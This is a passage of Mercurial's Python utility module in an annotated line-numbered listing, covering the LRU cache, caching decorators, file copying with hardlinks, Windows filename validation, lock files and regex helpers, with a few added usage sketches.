1470 1471 self._movetohead(node)
1471 1472
1472 1473 if self.maxcost:
1473 1474 self._enforcecostlimit()
1474 1475
1475 1476 return
1476 1477
1477 1478 if self._size < self.capacity:
1478 1479 node = self._addcapacity()
1479 1480 else:
1480 1481 # Grab the last/oldest item.
1481 1482 node = self._head.prev
1482 1483
1483 1484 # At capacity. Kill the old entry.
1484 1485 if node.key is not _notset:
1485 1486 self.totalcost -= node.cost
1486 1487 del self._cache[node.key]
1487 1488
1488 1489 node.key = k
1489 1490 node.value = v
1490 1491 node.cost = cost
1491 1492 self.totalcost += cost
1492 1493 self._cache[k] = node
1493 1494 # And mark it as newest entry. No need to adjust order since it
1494 1495 # is already self._head.prev.
1495 1496 self._head = node
1496 1497
1497 1498 if self.maxcost:
1498 1499 self._enforcecostlimit()
1499 1500
1500 1501 def __setitem__(self, k, v):
1501 1502 self.insert(k, v)
1502 1503
1503 1504 def __delitem__(self, k):
1504 1505 self.pop(k)
1505 1506
1506 1507 def pop(self, k, default=_notset):
1507 1508 try:
1508 1509 node = self._cache.pop(k)
1509 1510 except KeyError:
1510 1511 if default is _notset:
1511 1512 raise
1512 1513 return default
1513 1514
1514 1515 assert node is not None # help pytype
1515 1516 value = node.value
1516 1517 self.totalcost -= node.cost
1517 1518 node.markempty()
1518 1519
1519 1520 # Temporarily mark as newest item before re-adjusting head to make
1520 1521 # this node the oldest item.
1521 1522 self._movetohead(node)
1522 1523 self._head = node.next
1523 1524
1524 1525 return value
1525 1526
1526 1527 # Additional dict methods.
1527 1528
1528 1529 def get(self, k, default=None):
1529 1530 try:
1530 1531 return self.__getitem__(k)
1531 1532 except KeyError:
1532 1533 return default
1533 1534
1534 1535 def peek(self, k, default=_notset):
1535 1536 """Get the specified item without moving it to the head
1536 1537
1537 1538 Unlike get(), this doesn't mutate the internal state. But be aware
1538 1539 that this does not make peek() thread safe.
1539 1540 """
1540 1541 try:
1541 1542 node = self._cache[k]
1542 1543 return node.value
1543 1544 except KeyError:
1544 1545 if default is _notset:
1545 1546 raise
1546 1547 return default
1547 1548
1548 1549 def clear(self):
1549 1550 n = self._head
1550 1551 while n.key is not _notset:
1551 1552 self.totalcost -= n.cost
1552 1553 n.markempty()
1553 1554 n = n.next
1554 1555
1555 1556 self._cache.clear()
1556 1557
1557 1558 def copy(self, capacity=None, maxcost=0):
1558 1559 """Create a new cache as a copy of the current one.
1559 1560
1560 1561 By default, the new cache has the same capacity as the existing one.
1561 1562 But, the cache capacity can be changed as part of performing the
1562 1563 copy.
1563 1564
1564 1565 Items in the copy have an insertion/access order matching this
1565 1566 instance.
1566 1567 """
1567 1568
1568 1569 capacity = capacity or self.capacity
1569 1570 maxcost = maxcost or self.maxcost
1570 1571 result = lrucachedict(capacity, maxcost=maxcost)
1571 1572
1572 1573 # We copy entries by iterating in oldest-to-newest order so the copy
1573 1574 # has the correct ordering.
1574 1575
1575 1576 # Find the first non-empty entry.
1576 1577 n = self._head.prev
1577 1578 while n.key is _notset and n is not self._head:
1578 1579 n = n.prev
1579 1580
1580 1581 # We could potentially skip the first N items when decreasing capacity.
1581 1582 # But let's keep it simple unless it is a performance problem.
1582 1583 for i in range(len(self._cache)):
1583 1584 result.insert(n.key, n.value, cost=n.cost)
1584 1585 n = n.prev
1585 1586
1586 1587 return result
1587 1588
1588 1589 def popoldest(self):
1589 1590 """Remove the oldest item from the cache.
1590 1591
1591 1592 Returns the (key, value) describing the removed cache entry.
1592 1593 """
1593 1594 if not self._cache:
1594 1595 return
1595 1596
1596 1597 # Walk the linked list backwards starting at tail node until we hit
1597 1598 # a non-empty node.
1598 1599 n = self._head.prev
1599 1600 while n.key is _notset:
1600 1601 n = n.prev
1601 1602
1602 1603 assert n is not None # help pytype
1603 1604
1604 1605 key, value = n.key, n.value
1605 1606
1606 1607 # And remove it from the cache and mark it as empty.
1607 1608 del self._cache[n.key]
1608 1609 self.totalcost -= n.cost
1609 1610 n.markempty()
1610 1611
1611 1612 return key, value
1612 1613
1613 1614 def _movetohead(self, node):
1614 1615 """Mark a node as the newest, making it the new head.
1615 1616
1616 1617 When a node is accessed, it becomes the freshest entry in the LRU
1617 1618 list, which is denoted by self._head.
1618 1619
1619 1620 Visually, let's make ``N`` the new head node (* denotes head):
1620 1621
1621 1622 previous/oldest <-> head <-> next/next newest
1622 1623
1623 1624 ----<->--- A* ---<->-----
1624 1625 | |
1625 1626 E <-> D <-> N <-> C <-> B
1626 1627
1627 1628 To:
1628 1629
1629 1630 ----<->--- N* ---<->-----
1630 1631 | |
1631 1632 E <-> D <-> C <-> B <-> A
1632 1633
1633 1634 This requires the following moves:
1634 1635
1635 1636 C.next = D (node.prev.next = node.next)
1636 1637 D.prev = C (node.next.prev = node.prev)
1637 1638 E.next = N (head.prev.next = node)
1638 1639 N.prev = E (node.prev = head.prev)
1639 1640 N.next = A (node.next = head)
1640 1641 A.prev = N (head.prev = node)
1641 1642 """
1642 1643 head = self._head
1643 1644 # C.next = D
1644 1645 node.prev.next = node.next
1645 1646 # D.prev = C
1646 1647 node.next.prev = node.prev
1647 1648 # N.prev = E
1648 1649 node.prev = head.prev
1649 1650 # N.next = A
1650 1651 # It is tempting to do just "head" here, however if node is
1651 1652 # adjacent to head, this will do bad things.
1652 1653 node.next = head.prev.next
1653 1654 # E.next = N
1654 1655 node.next.prev = node
1655 1656 # A.prev = N
1656 1657 node.prev.next = node
1657 1658
1658 1659 self._head = node
1659 1660
1660 1661 def _addcapacity(self):
1661 1662 """Add a node to the circular linked list.
1662 1663
1663 1664 The new node is inserted before the head node.
1664 1665 """
1665 1666 head = self._head
1666 1667 node = _lrucachenode()
1667 1668 head.prev.next = node
1668 1669 node.prev = head.prev
1669 1670 node.next = head
1670 1671 head.prev = node
1671 1672 self._size += 1
1672 1673 return node
1673 1674
1674 1675 def _enforcecostlimit(self):
1675 1676 # This should run after an insertion. It should only be called if total
1676 1677 # cost limits are being enforced.
1677 1678 # The most recently inserted node is never evicted.
1678 1679 if len(self) <= 1 or self.totalcost <= self.maxcost:
1679 1680 return
1680 1681
1681 1682 # This is logically equivalent to calling popoldest() until we
1682 1683 # free up enough cost. We don't do that since popoldest() needs
1683 1684 # to walk the linked list and doing this in a loop would be
1684 1685 # quadratic. So we find the first non-empty node and then
1685 1686 # walk nodes until we free up enough capacity.
1686 1687 #
1687 1688 # If we only removed the minimum number of nodes to free enough
1688 1689 # cost at insert time, chances are high that the next insert would
1689 1690 # also require pruning. This would effectively constitute quadratic
1690 1691 # behavior for insert-heavy workloads. To mitigate this, we set a
1691 1692 # target cost that is a percentage of the max cost. This will tend
1692 1693 # to free more nodes when the high water mark is reached, which
1693 1694 # lowers the chances of needing to prune on the subsequent insert.
1694 1695 targetcost = int(self.maxcost * 0.75)
1695 1696
1696 1697 n = self._head.prev
1697 1698 while n.key is _notset:
1698 1699 n = n.prev
1699 1700
1700 1701 while len(self) > 1 and self.totalcost > targetcost:
1701 1702 del self._cache[n.key]
1702 1703 self.totalcost -= n.cost
1703 1704 n.markempty()
1704 1705 n = n.prev
1705 1706
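# Illustrative sketch, not part of the original module: how the optional cost
# accounting of lrucachedict drives eviction. The keys, values and costs are
# hypothetical; eviction frees entries until the total cost drops below a
# fraction of maxcost (75% at the time of writing).
def _lrucachedict_sketch():
    d = lrucachedict(4, maxcost=10)
    d.insert(b'a', b'value-a', cost=4)
    d.insert(b'b', b'value-b', cost=4)
    d.insert(b'c', b'value-c', cost=4)  # total cost 12 > 10: oldest entries go
    assert b'c' in d and b'a' not in d
    assert d.totalcost <= 10
    return d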
1706 1707
1707 1708 def lrucachefunc(func):
1708 1709 '''cache most recent results of function calls'''
1709 1710 cache = {}
1710 1711 order = collections.deque()
1711 1712 if func.__code__.co_argcount == 1:
1712 1713
1713 1714 def f(arg):
1714 1715 if arg not in cache:
1715 1716 if len(cache) > 20:
1716 1717 del cache[order.popleft()]
1717 1718 cache[arg] = func(arg)
1718 1719 else:
1719 1720 order.remove(arg)
1720 1721 order.append(arg)
1721 1722 return cache[arg]
1722 1723
1723 1724 else:
1724 1725
1725 1726 def f(*args):
1726 1727 if args not in cache:
1727 1728 if len(cache) > 20:
1728 1729 del cache[order.popleft()]
1729 1730 cache[args] = func(*args)
1730 1731 else:
1731 1732 order.remove(args)
1732 1733 order.append(args)
1733 1734 return cache[args]
1734 1735
1735 1736 return f
1736 1737
1737 1738
1738 1739 class propertycache(object):
1739 1740 def __init__(self, func):
1740 1741 self.func = func
1741 1742 self.name = func.__name__
1742 1743
1743 1744 def __get__(self, obj, type=None):
1744 1745 result = self.func(obj)
1745 1746 self.cachevalue(obj, result)
1746 1747 return result
1747 1748
1748 1749 def cachevalue(self, obj, value):
1749 1750 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1750 1751 obj.__dict__[self.name] = value
1751 1752
1752 1753
1753 1754 def clearcachedproperty(obj, prop):
1754 1755 '''clear a cached property value, if one has been set'''
1755 1756 prop = pycompat.sysstr(prop)
1756 1757 if prop in obj.__dict__:
1757 1758 del obj.__dict__[prop]
1758 1759
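# Illustrative sketch, not part of the original module: propertycache computes
# the value once per instance and stores it in the instance __dict__, so later
# lookups bypass the descriptor entirely. The class and names are hypothetical.
def _propertycache_sketch():
    counter = [0]

    class widget(object):
        @propertycache
        def answer(self):
            counter[0] += 1
            return 42

    w = widget()
    assert w.answer == 42
    assert w.answer == 42  # now read straight from w.__dict__
    assert counter[0] == 1
    clearcachedproperty(w, b'answer')  # next access recomputes
    return w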
1759 1760
1760 1761 def increasingchunks(source, min=1024, max=65536):
1761 1762 '''return no less than min bytes per chunk while data remains,
1762 1763 doubling min after each chunk until it reaches max'''
1763 1764
1764 1765 def log2(x):
1765 1766 if not x:
1766 1767 return 0
1767 1768 i = 0
1768 1769 while x:
1769 1770 x >>= 1
1770 1771 i += 1
1771 1772 return i - 1
1772 1773
1773 1774 buf = []
1774 1775 blen = 0
1775 1776 for chunk in source:
1776 1777 buf.append(chunk)
1777 1778 blen += len(chunk)
1778 1779 if blen >= min:
1779 1780 if min < max:
1780 1781 min = min << 1
1781 1782 nmin = 1 << log2(blen)
1782 1783 if nmin > min:
1783 1784 min = nmin
1784 1785 if min > max:
1785 1786 min = max
1786 1787 yield b''.join(buf)
1787 1788 blen = 0
1788 1789 buf = []
1789 1790 if buf:
1790 1791 yield b''.join(buf)
1791 1792
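# Illustrative sketch, not part of the original module: increasingchunks joins
# small input chunks into progressively larger output chunks. The chunk sizes
# below are hypothetical.
def _increasingchunks_sketch():
    chunks = list(increasingchunks([b'x' * 600] * 10))
    assert b''.join(chunks) == b'x' * 6000  # no data is lost or reordered
    assert len(chunks) < 10  # small chunks were coalesced
    assert len(chunks[0]) >= 1024  # first yield waits for at least the minimum
    return chunks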
1792 1793
1793 1794 def always(fn):
1794 1795 return True
1795 1796
1796 1797
1797 1798 def never(fn):
1798 1799 return False
1799 1800
1800 1801
1801 1802 def nogc(func):
1802 1803 """disable garbage collector
1803 1804
1804 1805 Python's garbage collector triggers a GC each time a certain number of
1805 1806 container objects (the number being defined by gc.get_threshold()) are
1806 1807 allocated even when marked not to be tracked by the collector. Tracking has
1807 1808 no effect on when GCs are triggered, only on what objects the GC looks
1808 1809 into. As a workaround, disable GC while building complex (huge)
1809 1810 containers.
1810 1811
1811 1812 This garbage collector issue has been fixed in 2.7, but it still affects
1812 1813 CPython's performance.
1813 1814 """
1814 1815
1815 1816 def wrapper(*args, **kwargs):
1816 1817 gcenabled = gc.isenabled()
1817 1818 gc.disable()
1818 1819 try:
1819 1820 return func(*args, **kwargs)
1820 1821 finally:
1821 1822 if gcenabled:
1822 1823 gc.enable()
1823 1824
1824 1825 return wrapper
1825 1826
1826 1827
1827 1828 if pycompat.ispypy:
1828 1829 # PyPy runs slower with gc disabled
1829 1830 nogc = lambda x: x
1830 1831
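# Illustrative sketch, not part of the original module: nogc is meant to wrap
# functions that allocate many container objects at once. The helper below is
# hypothetical; garbage collection stays disabled while the list is built.
@nogc
def _nogc_sketch(n=1000):
    return [{b'i': i} for i in range(n)]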
1831 1832
1832 1833 def pathto(root, n1, n2):
1833 1834 '''return the relative path from one place to another.
1834 1835 root should use os.sep to separate directories
1835 1836 n1 should use os.sep to separate directories
1836 1837 n2 should use "/" to separate directories
1837 1838 returns an os.sep-separated path.
1838 1839
1839 1840 If n1 is a relative path, it's assumed it's
1840 1841 relative to root.
1841 1842 n2 should always be relative to root.
1842 1843 '''
1843 1844 if not n1:
1844 1845 return localpath(n2)
1845 1846 if os.path.isabs(n1):
1846 1847 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1847 1848 return os.path.join(root, localpath(n2))
1848 1849 n2 = b'/'.join((pconvert(root), n2))
1849 1850 a, b = splitpath(n1), n2.split(b'/')
1850 1851 a.reverse()
1851 1852 b.reverse()
1852 1853 while a and b and a[-1] == b[-1]:
1853 1854 a.pop()
1854 1855 b.pop()
1855 1856 b.reverse()
1856 1857 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1857 1858
1858 1859
1859 1860 def checksignature(func, depth=1):
1860 1861 '''wrap a function with code to check for calling errors'''
1861 1862
1862 1863 def check(*args, **kwargs):
1863 1864 try:
1864 1865 return func(*args, **kwargs)
1865 1866 except TypeError:
1866 1867 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1867 1868 raise error.SignatureError
1868 1869 raise
1869 1870
1870 1871 return check
1871 1872
1872 1873
1873 1874 # a whitelist of known filesystems where hardlinks work reliably
1874 1875 _hardlinkfswhitelist = {
1875 1876 b'apfs',
1876 1877 b'btrfs',
1877 1878 b'ext2',
1878 1879 b'ext3',
1879 1880 b'ext4',
1880 1881 b'hfs',
1881 1882 b'jfs',
1882 1883 b'NTFS',
1883 1884 b'reiserfs',
1884 1885 b'tmpfs',
1885 1886 b'ufs',
1886 1887 b'xfs',
1887 1888 b'zfs',
1888 1889 }
1889 1890
1890 1891
1891 1892 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1892 1893 '''copy a file, preserving mode and optionally other stat info like
1893 1894 atime/mtime
1894 1895
1895 1896 checkambig argument is used with filestat, and is useful only if
1896 1897 destination file is guarded by any lock (e.g. repo.lock or
1897 1898 repo.wlock).
1898 1899
1899 1900 copystat and checkambig should be exclusive.
1900 1901 '''
1901 1902 assert not (copystat and checkambig)
1902 1903 oldstat = None
1903 1904 if os.path.lexists(dest):
1904 1905 if checkambig:
1905 1906 oldstat = checkambig and filestat.frompath(dest)
1906 1907 unlink(dest)
1907 1908 if hardlink:
1908 1909 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1909 1910 # unless we are confident that dest is on a whitelisted filesystem.
1910 1911 try:
1911 1912 fstype = getfstype(os.path.dirname(dest))
1912 1913 except OSError:
1913 1914 fstype = None
1914 1915 if fstype not in _hardlinkfswhitelist:
1915 1916 hardlink = False
1916 1917 if hardlink:
1917 1918 try:
1918 1919 oslink(src, dest)
1919 1920 return
1920 1921 except (IOError, OSError):
1921 1922 pass # fall back to normal copy
1922 1923 if os.path.islink(src):
1923 1924 os.symlink(os.readlink(src), dest)
1924 1925 # copytime is ignored for symlinks, but in general copytime isn't needed
1925 1926 # for them anyway
1926 1927 else:
1927 1928 try:
1928 1929 shutil.copyfile(src, dest)
1929 1930 if copystat:
1930 1931 # copystat also copies mode
1931 1932 shutil.copystat(src, dest)
1932 1933 else:
1933 1934 shutil.copymode(src, dest)
1934 1935 if oldstat and oldstat.stat:
1935 1936 newstat = filestat.frompath(dest)
1936 1937 if newstat.isambig(oldstat):
1937 1938 # stat of copied file is ambiguous to original one
1938 1939 advanced = (
1939 1940 oldstat.stat[stat.ST_MTIME] + 1
1940 1941 ) & 0x7FFFFFFF
1941 1942 os.utime(dest, (advanced, advanced))
1942 1943 except shutil.Error as inst:
1943 1944 raise error.Abort(stringutil.forcebytestr(inst))
1944 1945
1945 1946
1946 1947 def copyfiles(src, dst, hardlink=None, progress=None):
1947 1948 """Copy a directory tree using hardlinks if possible."""
1948 1949 num = 0
1949 1950
1950 1951 def settopic():
1951 1952 if progress:
1952 1953 progress.topic = _(b'linking') if hardlink else _(b'copying')
1953 1954
1954 1955 if os.path.isdir(src):
1955 1956 if hardlink is None:
1956 1957 hardlink = (
1957 1958 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1958 1959 )
1959 1960 settopic()
1960 1961 os.mkdir(dst)
1961 1962 for name, kind in listdir(src):
1962 1963 srcname = os.path.join(src, name)
1963 1964 dstname = os.path.join(dst, name)
1964 1965 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1965 1966 num += n
1966 1967 else:
1967 1968 if hardlink is None:
1968 1969 hardlink = (
1969 1970 os.stat(os.path.dirname(src)).st_dev
1970 1971 == os.stat(os.path.dirname(dst)).st_dev
1971 1972 )
1972 1973 settopic()
1973 1974
1974 1975 if hardlink:
1975 1976 try:
1976 1977 oslink(src, dst)
1977 1978 except (IOError, OSError):
1978 1979 hardlink = False
1979 1980 shutil.copy(src, dst)
1980 1981 else:
1981 1982 shutil.copy(src, dst)
1982 1983 num += 1
1983 1984 if progress:
1984 1985 progress.increment()
1985 1986
1986 1987 return hardlink, num
1987 1988
1988 1989
1989 1990 _winreservednames = {
1990 1991 b'con',
1991 1992 b'prn',
1992 1993 b'aux',
1993 1994 b'nul',
1994 1995 b'com1',
1995 1996 b'com2',
1996 1997 b'com3',
1997 1998 b'com4',
1998 1999 b'com5',
1999 2000 b'com6',
2000 2001 b'com7',
2001 2002 b'com8',
2002 2003 b'com9',
2003 2004 b'lpt1',
2004 2005 b'lpt2',
2005 2006 b'lpt3',
2006 2007 b'lpt4',
2007 2008 b'lpt5',
2008 2009 b'lpt6',
2009 2010 b'lpt7',
2010 2011 b'lpt8',
2011 2012 b'lpt9',
2012 2013 }
2013 2014 _winreservedchars = b':*?"<>|'
2014 2015
2015 2016
2016 2017 def checkwinfilename(path):
2017 2018 r'''Check that the base-relative path is a valid filename on Windows.
2018 2019 Returns None if the path is ok, or a UI string describing the problem.
2019 2020
2020 2021 >>> checkwinfilename(b"just/a/normal/path")
2021 2022 >>> checkwinfilename(b"foo/bar/con.xml")
2022 2023 "filename contains 'con', which is reserved on Windows"
2023 2024 >>> checkwinfilename(b"foo/con.xml/bar")
2024 2025 "filename contains 'con', which is reserved on Windows"
2025 2026 >>> checkwinfilename(b"foo/bar/xml.con")
2026 2027 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2027 2028 "filename contains 'AUX', which is reserved on Windows"
2028 2029 >>> checkwinfilename(b"foo/bar/bla:.txt")
2029 2030 "filename contains ':', which is reserved on Windows"
2030 2031 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2031 2032 "filename contains '\\x07', which is invalid on Windows"
2032 2033 >>> checkwinfilename(b"foo/bar/bla ")
2033 2034 "filename ends with ' ', which is not allowed on Windows"
2034 2035 >>> checkwinfilename(b"../bar")
2035 2036 >>> checkwinfilename(b"foo\\")
2036 2037 "filename ends with '\\', which is invalid on Windows"
2037 2038 >>> checkwinfilename(b"foo\\/bar")
2038 2039 "directory name ends with '\\', which is invalid on Windows"
2039 2040 '''
2040 2041 if path.endswith(b'\\'):
2041 2042 return _(b"filename ends with '\\', which is invalid on Windows")
2042 2043 if b'\\/' in path:
2043 2044 return _(b"directory name ends with '\\', which is invalid on Windows")
2044 2045 for n in path.replace(b'\\', b'/').split(b'/'):
2045 2046 if not n:
2046 2047 continue
2047 2048 for c in _filenamebytestr(n):
2048 2049 if c in _winreservedchars:
2049 2050 return (
2050 2051 _(
2051 2052 b"filename contains '%s', which is reserved "
2052 2053 b"on Windows"
2053 2054 )
2054 2055 % c
2055 2056 )
2056 2057 if ord(c) <= 31:
2057 2058 return _(
2058 2059 b"filename contains '%s', which is invalid on Windows"
2059 2060 ) % stringutil.escapestr(c)
2060 2061 base = n.split(b'.')[0]
2061 2062 if base and base.lower() in _winreservednames:
2062 2063 return (
2063 2064 _(b"filename contains '%s', which is reserved on Windows")
2064 2065 % base
2065 2066 )
2066 2067 t = n[-1:]
2067 2068 if t in b'. ' and n not in b'..':
2068 2069 return (
2069 2070 _(
2070 2071 b"filename ends with '%s', which is not allowed "
2071 2072 b"on Windows"
2072 2073 )
2073 2074 % t
2074 2075 )
2075 2076
2076 2077
2077 2078 timer = getattr(time, "perf_counter", None)
2078 2079
2079 2080 if pycompat.iswindows:
2080 2081 checkosfilename = checkwinfilename
2081 2082 if not timer:
2082 2083 timer = time.clock
2083 2084 else:
2084 2085 # mercurial.windows doesn't have platform.checkosfilename
2085 2086 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2086 2087 if not timer:
2087 2088 timer = time.time
2088 2089
2089 2090
2090 2091 def makelock(info, pathname):
2091 2092 """Create a lock file atomically if possible
2092 2093
2093 2094 This may leave a stale lock file if symlink isn't supported and signal
2094 2095 interrupt is enabled.
2095 2096 """
2096 2097 try:
2097 2098 return os.symlink(info, pathname)
2098 2099 except OSError as why:
2099 2100 if why.errno == errno.EEXIST:
2100 2101 raise
2101 2102 except AttributeError: # no symlink in os
2102 2103 pass
2103 2104
2104 2105 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2105 2106 ld = os.open(pathname, flags)
2106 2107 os.write(ld, info)
2107 2108 os.close(ld)
2108 2109
2109 2110
2110 2111 def readlock(pathname):
2111 2112 try:
2112 2113 return readlink(pathname)
2113 2114 except OSError as why:
2114 2115 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2115 2116 raise
2116 2117 except AttributeError: # no symlink in os
2117 2118 pass
2118 2119 with posixfile(pathname, b'rb') as fp:
2119 2120 return fp.read()
2120 2121
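# Illustrative sketch, not part of the original source: makelock()/readlock()
# form a pair; where symlinks are available the payload is stored in the link
# target, otherwise in a regular file created with O_EXCL. Payload and path
# below are hypothetical:
#
#     makelock(b'host.example.org:12345', b'.hg/wlock')
#     readlock(b'.hg/wlock')   # -> b'host.example.org:12345'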
2121 2122
2122 2123 def fstat(fp):
2123 2124 '''stat file object that may not have fileno method.'''
2124 2125 try:
2125 2126 return os.fstat(fp.fileno())
2126 2127 except AttributeError:
2127 2128 return os.stat(fp.name)
2128 2129
2129 2130
2130 2131 # File system features
2131 2132
2132 2133
2133 2134 def fscasesensitive(path):
2134 2135 """
2135 2136 Return true if the given path is on a case-sensitive filesystem
2136 2137
2137 2138 Requires a path (like /foo/.hg) ending with a foldable final
2138 2139 directory component.
2139 2140 """
2140 2141 s1 = os.lstat(path)
2141 2142 d, b = os.path.split(path)
2142 2143 b2 = b.upper()
2143 2144 if b == b2:
2144 2145 b2 = b.lower()
2145 2146 if b == b2:
2146 2147 return True # no evidence against case sensitivity
2147 2148 p2 = os.path.join(d, b2)
2148 2149 try:
2149 2150 s2 = os.lstat(p2)
2150 2151 if s2 == s1:
2151 2152 return False
2152 2153 return True
2153 2154 except OSError:
2154 2155 return True
2155 2156
2156 2157
2157 2158 try:
2158 2159 import re2 # pytype: disable=import-error
2159 2160
2160 2161 _re2 = None
2161 2162 except ImportError:
2162 2163 _re2 = False
2163 2164
2164 2165
2165 2166 class _re(object):
2166 2167 def _checkre2(self):
2167 2168 global _re2
2168 2169 try:
2169 2170 # check if match works, see issue3964
2170 2171 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2171 2172 except ImportError:
2172 2173 _re2 = False
2173 2174
2174 2175 def compile(self, pat, flags=0):
2175 2176 '''Compile a regular expression, using re2 if possible
2176 2177
2177 2178 For best performance, use only re2-compatible regexp features. The
2178 2179 only flags from the re module that are re2-compatible are
2179 2180 IGNORECASE and MULTILINE.'''
2180 2181 if _re2 is None:
2181 2182 self._checkre2()
2182 2183 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2183 2184 if flags & remod.IGNORECASE:
2184 2185 pat = b'(?i)' + pat
2185 2186 if flags & remod.MULTILINE:
2186 2187 pat = b'(?m)' + pat
2187 2188 try:
2188 2189 return re2.compile(pat)
2189 2190 except re2.error:
2190 2191 pass
2191 2192 return remod.compile(pat, flags)
2192 2193
2193 2194 @propertycache
2194 2195 def escape(self):
2195 2196 '''Return the version of escape corresponding to self.compile.
2196 2197
2197 2198 This is imperfect because whether re2 or re is used for a particular
2198 2199 function depends on the flags, etc, but it's the best we can do.
2199 2200 '''
2200 2201 global _re2
2201 2202 if _re2 is None:
2202 2203 self._checkre2()
2203 2204 if _re2:
2204 2205 return re2.escape
2205 2206 else:
2206 2207 return remod.escape
2207 2208
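# Illustrative sketch, not part of the original source: the module-level ``re``
# object below prefers re2 when it is importable and the flags are compatible,
# and otherwise falls back to the stdlib engine, so callers use it like this:
#
#     pat = re.compile(br'^[a-f0-9]{40}$', remod.IGNORECASE)
#     bool(pat.match(b'deadbeef' * 5))   # -> True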
2208 2209
2209 2210 re = _re()
2210 2211
2211 2212 _fspathcache = {}
2212 2213
2213 2214
2214 2215 def fspath(name, root):
2215 2216 '''Get name in the case stored in the filesystem
2216 2217
2217 2218 The name should be relative to root, and be normcase-ed for efficiency.
2218 2219
2219 2220 Note that this function is unnecessary, and should not be
2220 2221 called, for case-sensitive filesystems (simply because it's expensive).
2221 2222
2222 2223 The root should be normcase-ed, too.
2223 2224 '''
2224 2225
2225 2226 def _makefspathcacheentry(dir):
2226 2227 return {normcase(n): n for n in os.listdir(dir)}
2227 2228
2228 2229 seps = pycompat.ossep
2229 2230 if pycompat.osaltsep:
2230 2231 seps = seps + pycompat.osaltsep
2231 2232 # Protect backslashes. This gets silly very quickly.
2232 2233 seps.replace(b'\\', b'\\\\')
2233 2234 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2234 2235 dir = os.path.normpath(root)
2235 2236 result = []
2236 2237 for part, sep in pattern.findall(name):
2237 2238 if sep:
2238 2239 result.append(sep)
2239 2240 continue
2240 2241
2241 2242 if dir not in _fspathcache:
2242 2243 _fspathcache[dir] = _makefspathcacheentry(dir)
2243 2244 contents = _fspathcache[dir]
2244 2245
2245 2246 found = contents.get(part)
2246 2247 if not found:
2247 2248 # retry "once per directory" per "dirstate.walk" which
2248 2249 # may take place for each patch of "hg qpush", for example
2249 2250 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2250 2251 found = contents.get(part)
2251 2252
2252 2253 result.append(found or part)
2253 2254 dir = os.path.join(dir, part)
2254 2255
2255 2256 return b''.join(result)
2256 2257
2257 2258
2258 2259 def checknlink(testfile):
2259 2260 '''check whether hardlink count reporting works properly'''
2260 2261
2261 2262 # testfile may be open, so we need a separate file for checking to
2262 2263 # work around issue2543 (or testfile may get lost on Samba shares)
2263 2264 f1, f2, fp = None, None, None
2264 2265 try:
2265 2266 fd, f1 = pycompat.mkstemp(
2266 2267 prefix=b'.%s-' % os.path.basename(testfile),
2267 2268 suffix=b'1~',
2268 2269 dir=os.path.dirname(testfile),
2269 2270 )
2270 2271 os.close(fd)
2271 2272 f2 = b'%s2~' % f1[:-2]
2272 2273
2273 2274 oslink(f1, f2)
2274 2275 # nlinks() may behave differently for files on Windows shares if
2275 2276 # the file is open.
2276 2277 fp = posixfile(f2)
2277 2278 return nlinks(f2) > 1
2278 2279 except OSError:
2279 2280 return False
2280 2281 finally:
2281 2282 if fp is not None:
2282 2283 fp.close()
2283 2284 for f in (f1, f2):
2284 2285 try:
2285 2286 if f is not None:
2286 2287 os.unlink(f)
2287 2288 except OSError:
2288 2289 pass
2289 2290
2290 2291
2291 2292 def endswithsep(path):
2292 2293 '''Check path ends with os.sep or os.altsep.'''
2293 2294 return (
2294 2295 path.endswith(pycompat.ossep)
2295 2296 or pycompat.osaltsep
2296 2297 and path.endswith(pycompat.osaltsep)
2297 2298 )
2298 2299
2299 2300
2300 2301 def splitpath(path):
2301 2302 '''Split path by os.sep.
2302 2303 Note that this function does not use os.altsep because this is
2303 2304 an alternative to a simple "xxx.split(os.sep)".
2304 2305 It is recommended to use os.path.normpath() before using this
2305 2306 function if needed.'''
2306 2307 return path.split(pycompat.ossep)
2307 2308
2308 2309
2309 2310 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2310 2311 """Create a temporary file with the same contents from name
2311 2312
2312 2313 The permission bits are copied from the original file.
2313 2314
2314 2315 If the temporary file is going to be truncated immediately, you
2315 2316 can use emptyok=True as an optimization.
2316 2317
2317 2318 Returns the name of the temporary file.
2318 2319 """
2319 2320 d, fn = os.path.split(name)
2320 2321 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2321 2322 os.close(fd)
2322 2323 # Temporary files are created with mode 0600, which is usually not
2323 2324 # what we want. If the original file already exists, just copy
2324 2325 # its mode. Otherwise, manually obey umask.
2325 2326 copymode(name, temp, createmode, enforcewritable)
2326 2327
2327 2328 if emptyok:
2328 2329 return temp
2329 2330 try:
2330 2331 try:
2331 2332 ifp = posixfile(name, b"rb")
2332 2333 except IOError as inst:
2333 2334 if inst.errno == errno.ENOENT:
2334 2335 return temp
2335 2336 if not getattr(inst, 'filename', None):
2336 2337 inst.filename = name
2337 2338 raise
2338 2339 ofp = posixfile(temp, b"wb")
2339 2340 for chunk in filechunkiter(ifp):
2340 2341 ofp.write(chunk)
2341 2342 ifp.close()
2342 2343 ofp.close()
2343 2344 except: # re-raises
2344 2345 try:
2345 2346 os.unlink(temp)
2346 2347 except OSError:
2347 2348 pass
2348 2349 raise
2349 2350 return temp
2350 2351
2351 2352
2352 2353 class filestat(object):
2353 2354 """help to exactly detect change of a file
2354 2355
2355 2356 'stat' attribute is result of 'os.stat()' if specified 'path'
2356 2357 exists. Otherwise, it is None. This avoids a preparatory
2357 2358 'exists()' check on the caller's side.
2358 2359 """
2359 2360
2360 2361 def __init__(self, stat):
